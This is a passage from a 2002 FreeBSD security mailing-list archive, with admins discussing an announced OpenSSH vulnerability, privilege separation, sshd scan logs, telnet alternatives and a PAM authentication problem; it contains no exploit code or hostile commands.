messed up some authentications (I believe). Radius works fine, Telnet SRA works fine, FTPD works fine, but pop3 is having some authentication issues (with about 10% of my database). If I telnet in, and re-enter that users password all is fine. When I use pwd_mkdb (from my accounting script) it is not. Is there a compatibility issue between pwd_mkdb and PAM, or am I missing an entry in the pam.conf? Thanks! Bob To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jun 25 12:19:47 2002 Delivered-To: freebsd-security@freebsd.org Received: from radix.cryptio.net (radix.cryptio.net [199.181.107.213]) by hub.freebsd.org (Postfix) with ESMTP id BE48E37BB25; Tue, 25 Jun 2002 12:19:24 -0700 (PDT) Received: from radix.cryptio.net (localhost [127.0.0.1]) by radix.cryptio.net (8.12.3/8.12.3) with ESMTP id g5PJJFYt033345 (version=TLSv1/SSLv3 cipher=EDH-RSA-DES-CBC3-SHA bits=168 verify=NO); Tue, 25 Jun 2002 12:19:16 -0700 (PDT) (envelope-from emechler@radix.cryptio.net) Received: (from emechler@localhost) by radix.cryptio.net (8.12.3/8.12.3/Submit) id g5PJJFfE033344; Tue, 25 Jun 2002 12:19:15 -0700 (PDT) Date: Tue, 25 Jun 2002 12:19:15 -0700 From: Erick Mechler To: Doug Barton Cc: Michael Richards , security@FreeBSD.ORG Subject: Re: Upcoming OpenSSH vulnerability Message-ID: <20020625121915.P21793@techometer.net> References: <3D17F647.000045.31912@ns.interchange.ca> <3D183942.6FF6C3B4@FreeBSD.org> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5.1i In-Reply-To: <3D183942.6FF6C3B4@FreeBSD.org>; from Doug Barton on Tue, Jun 25, 2002 at 02:34:58AM -0700 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org :: > After reviewing the code of the new 3.3.1p I've located a very simple :: > yet obscure root exploit for this new version :: :: Can we safely assume that you've made the openssh developers aware of :: your findings? Michael, Doug, any word on the status of this? Have the OpenSSH developers been notified of this? To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jun 25 12:25:19 2002 Delivered-To: freebsd-security@freebsd.org Received: from a2.scoop.co.nz (aurora.scoop.co.nz [203.96.152.68]) by hub.freebsd.org (Postfix) with ESMTP id 36B3837B400 for ; Tue, 25 Jun 2002 12:25:07 -0700 (PDT) Received: from localhost (localhost [127.0.0.1]) by a2.scoop.co.nz (8.12.2/8.12.2) with ESMTP id g5PJP261091980; Wed, 26 Jun 2002 07:25:02 +1200 (NZST) (envelope-from andrew@scoop.co.nz) Date: Wed, 26 Jun 2002 07:25:02 +1200 (NZST) From: Andrew McNaughton X-X-Sender: andrew@a2 To: Brian Behlendorf Cc: Niels Provos , Subject: Re: UseLogin and openssh-portable priv separation In-Reply-To: <20020625084414.K310-100000@yez.hyperreal.org> Message-ID: <20020626071030.A91731-100000@a2> MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Tue, 25 Jun 2002, Brian Behlendorf wrote: > On Tue, 25 Jun 2002, Niels Provos wrote: > > If you do UseLogin, that means that you will loose privilege > > separation after authentication. The Pre-authentication phase is > > still privilege separated even with UseLogin enabled. > > Right, I got that from the man page, but was still slightly unclear: does > using UseLogin remove the security that prevents the to-be-released > exploit from being exploitable? Sounds like it does not remove that > security, *unless* the attack came from someone who successfully > authenticated, who could then get root? As I understand things... Whether or not you have UseLogin enabled, then a chrooted process run as user sshd will be forked to handle the authentication stage. This process terminates before the session is established. You should be able to see this process in your process accounting files with lastcomm if you've turned the accounting on. If UseLogin is not enabled, sshd will then fork a process with the priviledges of the user who is logging in, and this process will be the parent of the spawned shell or other command, and will persist for the duration of the connection. If UseLogin is enabled then sshd won't fork a process owned by the user. Once the session is started you will see much the same info in ps output that you did before the new privilege separation was added. whether this has any bearing on the soon to be relased exploit I obviously cannot say for certain, but if UseLogin meant that the exploit could still run, then I imagine Theo would have said so. Andrew McNaughton To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jun 25 12:38:39 2002 Delivered-To: freebsd-security@freebsd.org Received: from nef.ens.fr (nef.ens.fr [129.199.96.32]) by hub.freebsd.org (Postfix) with ESMTP id 0612337B406; Tue, 25 Jun 2002 12:38:30 -0700 (PDT) Received: from corto.lpt.ens.fr (corto.lpt.ens.fr [129.199.122.2]) by nef.ens.fr (8.10.1/1.01.28121999) with ESMTP id g5PJcSo86735 ; Tue, 25 Jun 2002 21:38:28 +0200 (CEST) Received: from (rsidd@localhost) by corto.lpt.ens.fr (8.9.3/jtpda-5.3.1) id VAA24441 ; Tue, 25 Jun 2002 21:38:27 +0200 (CEST) Date: Tue, 25 Jun 2002 21:38:27 +0200 From: Rahul Siddharthan To: Erick Mechler Cc: Doug Barton , Michael Richards , security@FreeBSD.ORG Subject: Re: Upcoming OpenSSH vulnerability Message-ID: <20020625213826.A24278@lpt.ens.fr> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <20020625121915.P21793@techometer.net> X-Operating-System: FreeBSD 3.4-STABLE i386 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Erick Mechler wrote: > :: > After reviewing the code of the new 3.3.1p I've located a very simple > :: > yet obscure root exploit for this new version > :: > :: Can we safely assume that you've made the openssh developers aware of > :: your findings? > > Michael, Doug, any word on the status of this? Have the OpenSSH developers > been notified of this? Reading the rest of that mail, I get the impression it was some sort of dumb joke/rhetorical statement, he didn't really have an exploit... - Rahul To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jun 25 12:42:24 2002 Delivered-To: freebsd-security@freebsd.org Received: from hawaii.rr.com (hnlmail2.hawaii.rr.com [24.25.227.35]) by hub.freebsd.org (Postfix) with ESMTP id E9B6137B400 for ; Tue, 25 Jun 2002 12:42:15 -0700 (PDT) Received: from hercules.hawaii.rr.com ([66.8.246.102]) by hawaii.rr.com with Microsoft SMTPSVC(5.5.1877.517.51); Tue, 25 Jun 2002 09:42:14 -1000 Message-Id: <5.1.0.14.2.20020625094607.00bb2470@mail.speedshellz.net> X-Sender: gor@mail.hawaii.rr.com X-Mailer: QUALCOMM Windows Eudora Version 5.1 Date: Tue, 25 Jun 2002 09:47:16 -1000 To: FreeBSD-security@FreeBSD.org From: gor Subject: subscribe Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii"; format=flowed Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org subscribe freebsd-security To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jun 25 13: 1:34 2002 Delivered-To: freebsd-security@freebsd.org Received: from mail.interchange.ca (ns.interchange.ca [216.126.79.2]) by hub.freebsd.org (Postfix) with ESMTP id B3C3737B481 for ; Tue, 25 Jun 2002 13:00:28 -0700 (PDT) Received: by mail.interchange.ca (Fastmailer, from userid 555) id 54EB23C17; Tue, 25 Jun 2002 15:50:29 -0400 (EDT) MIME-Version: 1.0 Message-Id: <3D18C985.000067.31912@ns.interchange.ca> Content-Type: Multipart/Mixed; boundary="------------Boundary-00=_5S1AY293LIFNTT4D7TH0" To: rsidd@online.fr Subject: Re: Upcoming OpenSSH vulnerability Cc: security@FreeBSD.ORG From: "Michael Richards" X-Fastmail-IP: [24.43.130.241] Received: from 24.43.130.241 by www.fastmail.ca with HTTP; Tue, 25 Jun 2002 19:50:29 +0000 (UTC) Date: Tue, 25 Jun 2002 15:50:29 -0400 (EDT) Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org --------------Boundary-00=_5S1AY293LIFNTT4D7TH0 Content-Type: Text/Plain Content-Transfer-Encoding: 7bit >> Michael, Doug, any word on the status of this? Have the OpenSSH >> developers been notified of this? > > Reading the rest of that mail, I get the impression it was some > sort of dumb joke/rhetorical statement, he didn't really have an > exploit... Yes, I thought it was sarcastic enough that everyone would take it as that. As a result of something I saw this AM I believe it would be a great idea to upgrade immediately. There is an exploit out in the wild and it's been demonstrated to me. I've been spending all day frantically upgrading all of our machines. Will probably be up long into the night ensuring everything is up and working. -Michael _________________________________________________________________ http://fastmail.ca/ - Fast Secure Web Email for Canadians --------------Boundary-00=_5S1AY293LIFNTT4D7TH0-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jun 25 14:10:30 2002 Delivered-To: freebsd-security@freebsd.org Received: from eterna.binary.net (eterna.binary.net [216.229.0.25]) by hub.freebsd.org (Postfix) with ESMTP id 1785537B400 for ; Tue, 25 Jun 2002 14:10:21 -0700 (PDT) Received: from matrix.binary.net (matrix.binary.net [216.229.0.2]) by eterna.binary.net (Postfix) with ESMTP id F138EB431F for ; Tue, 25 Jun 2002 16:10:19 -0500 (CDT) Received: by matrix.binary.net (Postfix, from userid 1021) id D0BA91EC204; Tue, 25 Jun 2002 16:10:19 -0500 (CDT) Date: Tue, 25 Jun 2002 16:10:19 -0500 From: Blaine Kahle To: security@freebsd.org Subject: Re: Upcoming OpenSSH vulnerability Message-ID: <20020625161019.A52785@matrix.binary.net> References: <3D18C985.000067.31912@ns.interchange.ca> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5.1i In-Reply-To: <3D18C985.000067.31912@ns.interchange.ca>; from michael@fastmail.ca on Tue, Jun 25, 2002 at 03:50:29PM -0400 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Tue, Jun 25, 2002 at 03:50:29PM -0400, Michael Richards wrote: > >> Michael, Doug, any word on the status of this? Have the OpenSSH > >> developers been notified of this? > > > > Reading the rest of that mail, I get the impression it was some > > sort of dumb joke/rhetorical statement, he didn't really have an > > exploit... > > Yes, I thought it was sarcastic enough that everyone would take it as > that. As a result of something I saw this AM I believe it would be a > great idea to upgrade immediately. There is an exploit out in the > wild and it's been demonstrated to me. I've been spending all day > frantically upgrading all of our machines. Will probably be up long > into the night ensuring everything is up and working. And I think it's being scanned for: Jun 25 16:10:06 aspire sshd[26012]: scanned from 203.74.9.16 with SSH-1.0-SSH_Version_Mapper. Don't panic. Jun 25 16:10:06 aspire sshd[26009]: Did not receive identification string from 203.74.9.16 203.74.9.16 is APNIC. In case you're wondering about the logged "Don't panic." message, it's in the source: if (datafellows & SSH_BUG_SCANNER) { log("scanned from %s with %s. Don't panic.", get_remote_ipaddr(), client_version_string); fatal_cleanup(); } This scanner triggered a warning page to me because it tied up the default limit of 10 unauthenticated SSH sessions. -- Blaine Kahle blaine@binary.net Systems Programmer Binary Net, Inc. UID 0, Zip, Zilch, Nada www.binary.net 0x178AA0E0 Do not meddle in the affairs of sysadmins, for they are quick to anger and have no need for subtlety. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jun 25 14:21:48 2002 Delivered-To: freebsd-security@freebsd.org Received: from mailsrv.otenet.gr (mailsrv.otenet.gr [195.170.0.5]) by hub.freebsd.org (Postfix) with ESMTP id 52BE137B400 for ; Tue, 25 Jun 2002 14:21:43 -0700 (PDT) Received: from hades.hell.gr (patr530-a014.otenet.gr [212.205.215.14]) by mailsrv.otenet.gr (8.12.3/8.12.3) with ESMTP id g5PLLZ42005709; Wed, 26 Jun 2002 00:21:38 +0300 (EEST) Received: from hades.hell.gr (hades [127.0.0.1]) by hades.hell.gr (8.12.4/8.12.4) with ESMTP id g5PLLYeC003999; Wed, 26 Jun 2002 00:21:34 +0300 (EEST) (envelope-from keramida@FreeBSD.org) Received: (from charon@localhost) by hades.hell.gr (8.12.4/8.12.4/Submit) id g5PLLYJm003998; Wed, 26 Jun 2002 00:21:34 +0300 (EEST) (envelope-from keramida@FreeBSD.org) Date: Wed, 26 Jun 2002 00:21:34 +0300 From: Giorgos Keramidas To: Miroslav Pendev Cc: security@FreeBSD.org Subject: Re: The good old telnet... Message-ID: <20020625212133.GC2146@hades.hell.gr> References: <20020625042313.GA75674@CPE0004761ac738-CM00109515bc65.cpe.net.cable.rogers.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: <20020625042313.GA75674@CPE0004761ac738-CM00109515bc65.cpe.net.cable.rogers.com> X-Operating-System: FreeBSD 5.0-CURRENT #0: Sun Jun 23 22:51:33 EEST 2002 X-PGP-Fingerprint: C1EB 0653 DB8B A557 3829 00F9 D60F 941A 3186 03B6 X-Phone: +30-944-116520 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On 2002-06-25 00:23 +0000, Miroslav Pendev wrote: > Please, do not missunderstand me, I would like to use SSH instead of > telnet, but... I am FreeBSD user and I trust in FreeBSD core team, > not somebody else... until the 'patch' is released *when the moon is > in capricorn* telnet may not be such a bad idea ;-) There is always Telnet + Kerberos. - Giorgos To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jun 25 14:26:56 2002 Delivered-To: freebsd-security@freebsd.org Received: from mail.gbronline.com (mail.gbronline.com [12.145.226.4]) by hub.freebsd.org (Postfix) with ESMTP id B4BF237B403 for ; Tue, 25 Jun 2002 14:26:48 -0700 (PDT) Received: from daleco [12.145.236.48] by mail.gbronline.com (SMTPD32-7.10) id AFBBB990070; Tue, 25 Jun 2002 16:25:15 -0500 Message-ID: <010801c21c8e$f2860b80$30ec910c@fbccarthage.com> From: "Kevin Kinsey, DaleCo, S.P." To: "Blaine Kahle" , References: <3D18C985.000067.31912@ns.interchange.ca> <20020625161019.A52785@matrix.binary.net> Subject: Re: Upcoming OpenSSH vulnerability Date: Tue, 25 Jun 2002 16:26:17 -0500 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 6.00.2600.0000 X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org ----- Original Message ----- From: "Blaine Kahle" To: Sent: Tuesday, June 25, 2002 4:10 PM Subject: Re: Upcoming OpenSSH vulnerability > On Tue, Jun 25, 2002 at 03:50:29PM -0400, Michael Richards wrote: > > >> Michael, Doug, any word on the status of this? Have the OpenSSH > > >> developers been notified of this? > > > > > > Reading the rest of that mail, I get the impression it was some > > > sort of dumb joke/rhetorical statement, he didn't really have an > > > exploit... > > > > Yes, I thought it was sarcastic enough that everyone would take it as > > that. As a result of something I saw this AM I believe it would be a > > great idea to upgrade immediately. There is an exploit out in the > > wild and it's been demonstrated to me. I've been spending all day > > frantically upgrading all of our machines. Will probably be up long > > into the night ensuring everything is up and working. > > And I think it's being scanned for: > > Jun 25 16:10:06 aspire sshd[26012]: scanned from 203.74.9.16 with SSH-1.0-SSH_Version_Mapper. Don't panic. > Jun 25 16:10:06 aspire sshd[26009]: Did not receive identification string from 203.74.9.16 > Doubt that it's this exploit in _particular_ that they're looking for. Perhaps it's that and anything else they can find out about you. Like it says, "Don't panic." This is very common and was happening long before this thread came up. If anything, I've been seeing it less in the last 3-4 days. Hmm, maybe it's time to should recheck the IDS & checksums :-) Kevin Kinsey To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jun 25 14:41:29 2002 Delivered-To: freebsd-security@freebsd.org Received: from patrocles.silby.com (d8.as8.nwbl0.wi.voyager.net [169.207.132.8]) by hub.freebsd.org (Postfix) with ESMTP id 96DF637B403 for ; Tue, 25 Jun 2002 14:41:23 -0700 (PDT) Received: from patrocles.silby.com (localhost [127.0.0.1]) by patrocles.silby.com (8.12.4/8.12.4) with ESMTP id g5PLhTcv059441; Tue, 25 Jun 2002 16:43:29 -0500 (CDT) (envelope-from silby@silby.com) Received: from localhost (silby@localhost) by patrocles.silby.com (8.12.4/8.12.4/Submit) with ESMTP id g5PLhN0J059438; Tue, 25 Jun 2002 16:43:24 -0500 (CDT) X-Authentication-Warning: patrocles.silby.com: silby owned process doing -bs Date: Tue, 25 Jun 2002 16:43:23 -0500 (CDT) From: Mike Silbersack To: Brian Nelson Cc: Niels Provos , FreeBSD Security Subject: Re: ENOUGH!!! Re: [openssh-unix-announce] Re: Upcoming OpenSSH vu lner ability (fwd) In-Reply-To: <3D18B2D9.6030203@notgod.com> Message-ID: <20020625164241.J59112-100000@patrocles.silby.com> MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Tue, 25 Jun 2002, Brian Nelson wrote: > So far, against all odds, Brett Glass has had the most stable, > unemotional, and responsible response to this whole issue... everyone > else likes to yell at you when you don't trust whatever they say because > they are "big head figures" or suffering from "Young Geek Ego(tm)". This just proves that there is an exploit in the wild, and that someone has hacked Brett's box and is impersonating him. :) Mike "Silby" Silbersack To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jun 25 14:45:57 2002 Delivered-To: freebsd-security@freebsd.org Received: from nu.binary.net (nu.binary.net [216.229.0.6]) by hub.freebsd.org (Postfix) with ESMTP id 7DDC437B400 for ; Tue, 25 Jun 2002 14:45:51 -0700 (PDT) Received: from deskpuppy.ops.binary.net (xanadu-pub.binary.net [216.229.9.34]) by nu.binary.net (Postfix) with ESMTP id 1542C9BC5C; Tue, 25 Jun 2002 16:45:51 -0500 (CDT) Received: by deskpuppy.ops.binary.net (Postfix, from userid 1000) id 72069ECDD4; Tue, 25 Jun 2002 16:45:07 -0500 (CDT) Date: Tue, 25 Jun 2002 16:45:07 -0500 From: Blaine Kahle To: "Kevin Kinsey, DaleCo, S.P." Cc: security@FreeBSD.ORG Subject: Re: Upcoming OpenSSH vulnerability Message-ID: <20020625214507.GE2718@deskpuppy.ops.binary.net> Mail-Followup-To: "Kevin Kinsey, DaleCo, S.P." , security@FreeBSD.ORG References: <3D18C985.000067.31912@ns.interchange.ca> <20020625161019.A52785@matrix.binary.net> <010801c21c8e$f2860b80$30ec910c@fbccarthage.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: <010801c21c8e$f2860b80$30ec910c@fbccarthage.com> User-Agent: Mutt/1.4i Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Tue, Jun 25, 2002 at 04:26:17PM -0500, Kevin Kinsey, DaleCo, S.P. wrote: > ----- Original Message ----- > From: "Blaine Kahle" > > And I think it's being scanned for: > > > > Jun 25 16:10:06 aspire sshd[26012]: scanned from 203.74.9.16 with > > SSH-1.0-SSH_Version_Mapper. Don't panic. > > Jun 25 16:10:06 aspire sshd[26009]: Did not receive identification > > string from 203.74.9.16 > > Doubt that it's this exploit in _particular_ that they're looking for. > Perhaps it's that and anything else they can find out about you. Like > it says, "Don't panic." This is very common and was happening long > before this thread came up. If anything, I've been seeing it less in > the last 3-4 days. Hmm, maybe it's time to should recheck the IDS & > checksums :-) My apologies for the reflex. I'd never noticed this scan before, and the coincidence was just too tasty. I concur that these scans have gone on a long time, but my rate of being scanned has risen the past few days. -- Blaine Kahle blaine@binary.net Systems Programmer Binary Net, Inc. UID 0, Zip, Zilch, Nada www.binary.net 0x178AA0E0 Do not meddle in the affairs of sysadmins, for they are quick to anger and have no need for subtlety. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jun 25 14:55:11 2002 Delivered-To: freebsd-security@freebsd.org Received: from CPE0004761ac738-CM00109515bc65.cpe.net.cable.rogers.com (CPE0004761ac738-CM00109515bc65.cpe.net.cable.rogers.com [24.103.39.131]) by hub.freebsd.org (Postfix) with SMTP id 8A9CB37B404 for ; Tue, 25 Jun 2002 14:55:06 -0700 (PDT) Received: (qmail 84351 invoked from network); 25 Jun 2002 21:55:26 -0000 Received: from unknown (HELO vsivyoung) (66.46.21.253) by cpe0004761ac738-cm00109515bc65.cpe.net.cable.rogers.com with SMTP; 25 Jun 2002 21:55:26 -0000 Message-ID: <021301c21c93$2e2b8710$c801a8c0@vsivyoung> From: "Miroslav Pendev" To: "Giorgos Keramidas" Cc: References: <20020625042313.GA75674@CPE0004761ac738-CM00109515bc65.cpe.net.cable.rogers.com> <20020625212133.GC2146@hades.hell.gr> Subject: Re: The good old telnet... Date: Tue, 25 Jun 2002 17:56:36 -0400 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 6.00.2600.0000 X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org > On 2002-06-25 00:23 +0000, Miroslav Pendev wrote: > > Please, do not missunderstand me, I would like to use SSH instead of > > telnet, but... I am FreeBSD user and I trust in FreeBSD core team, > > not somebody else... until the 'patch' is released *when the moon is > > in capricorn* telnet may not be such a bad idea ;-) > > There is always Telnet + Kerberos. > > - Giorgos > Thanks for the idea ;-) I will try... :-> --Miro To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jun 25 15: 3:34 2002 Delivered-To: freebsd-security@freebsd.org Received: from web10107.mail.yahoo.com (web10107.mail.yahoo.com [216.136.130.57]) by hub.freebsd.org (Postfix) with SMTP id D716A37B403 for ; Tue, 25 Jun 2002 15:03:26 -0700 (PDT) Message-ID: <20020625220326.17032.qmail@web10107.mail.yahoo.com> Received: from [192.128.134.68] by web10107.mail.yahoo.com via HTTP; Tue, 25 Jun 2002 15:03:26 PDT Date: Tue, 25 Jun 2002 15:03:26 -0700 (PDT) From: twig les Subject: Re: The good old telnet... To: Miroslav Pendev , Giorgos Keramidas Cc: security@FreeBSD.org In-Reply-To: <021301c21c93$2e2b8710$c801a8c0@vsivyoung> MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Actually we use telnet/radius/secureID on some of the Cisco gear that *still* doesn't support SSH (not even the version 1.5 the other IOSes do). one-time passwds are a big improvement even though all the commands (and the TFTP config uploads...sigh) are free-for-all. --- Miroslav Pendev wrote: > > On 2002-06-25 00:23 +0000, Miroslav Pendev wrote: > > > Please, do not missunderstand me, I would like > to use SSH instead of > > > telnet, but... I am FreeBSD user and I trust in > FreeBSD core team, > > > not somebody else... until the 'patch' is > released *when the moon is > > > in capricorn* telnet may not be such a bad idea > ;-) > > > > There is always Telnet + Kerberos. > > > > - Giorgos > > > > Thanks for the idea ;-) I will try... > > :-> > > --Miro > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of > the message ===== ----------------------------------------------------------- Only fools have all the answers. ----------------------------------------------------------- __________________________________________________ Do You Yahoo!? Yahoo! - Official partner of 2002 FIFA World Cup http://fifaworldcup.yahoo.com To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jun 25 16:23:49 2002 Delivered-To: freebsd-security@freebsd.org Received: from apnic.net (cumin.apnic.net [202.12.29.59]) by hub.freebsd.org (Postfix) with ESMTP id B326A37B403 for ; Tue, 25 Jun 2002 16:23:39 -0700 (PDT) Received: from durian.apnic.net (durian.apnic.net [202.12.29.252]) by apnic.net (8.12.1/8.12.1) with ESMTP id g5PNNXFi018989; Wed, 26 Jun 2002 09:23:34 +1000 Received: from durian.apnic.net (ggm@localhost) by durian.apnic.net (8.11.6/8.11.6) with ESMTP id g5PNNSg30410; Wed, 26 Jun 2002 09:23:32 +1000 To: security@freebsd.org Cc: goatee@binary.net Subject: Random address in asia != APNIC From: ggm@apnic.net Date: Wed, 26 Jun 2002 09:23:28 +1000 Message-ID: <30409.1025047408@durian.apnic.net> X-Scanned-By: MIMEDefang 2.1 (www dot roaringpenguin dot com slash mimedefang) Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Blaine Kahle Said in security@freebsd.org: > And I think it's being scanned for: > > Jun 25 16:10:06 aspire sshd[26012]: scanned from 203.74.9.16 with > SSH-1.0-SSH_Version_Mapper. Don't panic. > Jun 25 16:10:06 aspire sshd[26009]: Did not receive identification string > from 203.74.9.16 > >203.74.9.16 is APNIC. Please, if you work in a 'security' domain in FreeBSD, do not, ever attribute random addresses to the Internet Registry that allocated them. APNIC, RIPE, ARIN (and soon LACNIC and AFRNIC) are registries. They are not the source, they provision the handing out of the addresses. They are not responsible for the packet source, or destination of arbitrary flows in the internet. Indeed, whois contact information is often out of date, and the whois returns the /8 network region which is the parent block, but that doesn't make the packets 'ours' -It just means we're doing the best we can to tell you where the addresses were obtained. Not where they are used, not where the sender is. If you run, configure, write code which intuits owners from whois, can you not propagate this mistake please? cheers -George George Michaelson | APNIC Email: ggm@apnic.net | PO Box 2131 Milton QLD 4064 Phone: +61 7 3858 3100 | Australia Fax: +61 7 3858 3199 | http://www.apnic.net To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jun 25 16:37:56 2002 Delivered-To: freebsd-security@freebsd.org Received: from lariat.org (lariat.org [63.229.157.2]) by hub.freebsd.org (Postfix) with ESMTP id 5DA7A37B400 for ; Tue, 25 Jun 2002 16:37:53 -0700 (PDT) Received: from mustang.lariat.org (IDENT:ppp1000.lariat.org@lariat.org [63.229.157.2]) by lariat.org (8.9.3/8.9.3) with ESMTP id RAA02292; Tue, 25 Jun 2002 17:37:40 -0600 (MDT) X-message-flag: Warning! Use of Microsoft Outlook is dangerous and makes your system susceptible to Internet worms. Message-Id: <4.3.2.7.2.20020625173402.00b4af00@localhost> X-Sender: brett@localhost X-Mailer: QUALCOMM Windows Eudora Version 4.3.2 Date: Tue, 25 Jun 2002 17:37:31 -0600 To: Mike Silbersack , Brian Nelson From: Brett Glass Subject: Re: ENOUGH!!! Re: [openssh-unix-announce] Re: Upcoming OpenSSH vu lner ability (fwd) Cc: Niels Provos , FreeBSD Security In-Reply-To: <20020625164241.J59112-100000@patrocles.silby.com> References: <3D18B2D9.6030203@notgod.com> Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Geeze.... Just when someone finally says something nice about me on this list.... ;-) Seriously, though, I'm just being practical. BTW, I've finally managed to build a working binary package that will replace the \ built-in OpenSSH in place on 4.4, 4.5, and 4.5-RELEASE. You may have to change /etc/ssh/sshd_config by hand afterward, but then you'll get privilege separation. Anyone who would like a download or would like to post it, just e-mail. --Brett At 03:43 PM 6/25/2002, Mike Silbersack wrote: >On Tue, 25 Jun 2002, Brian Nelson wrote: > >> So far, against all odds, Brett Glass has had the most stable, >> unemotional, and responsible response to this whole issue... everyone >> else likes to yell at you when you don't trust whatever they say because >> they are "big head figures" or suffering from "Young Geek Ego(tm)". > >This just proves that there is an exploit in the wild, and that someone >has hacked Brett's box and is impersonating him. :) > >Mike "Silby" Silbersack > > >To Unsubscribe: send mail to majordomo@FreeBSD.org >with "unsubscribe freebsd-security" in the body of the message To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jun 25 16:39:40 2002 Delivered-To: freebsd-security@freebsd.org Received: from a2.scoop.co.nz (aurora.scoop.co.nz [203.96.152.68]) by hub.freebsd.org (Postfix) with ESMTP id 3EAB237B43F for ; Tue, 25 Jun 2002 16:38:33 -0700 (PDT) Received: from localhost (localhost [127.0.0.1]) by a2.scoop.co.nz (8.12.2/8.12.2) with ESMTP id g5PNcUI5001004; Wed, 26 Jun 2002 11:38:30 +1200 (NZST) (envelope-from andrew@scoop.co.nz) Date: Wed, 26 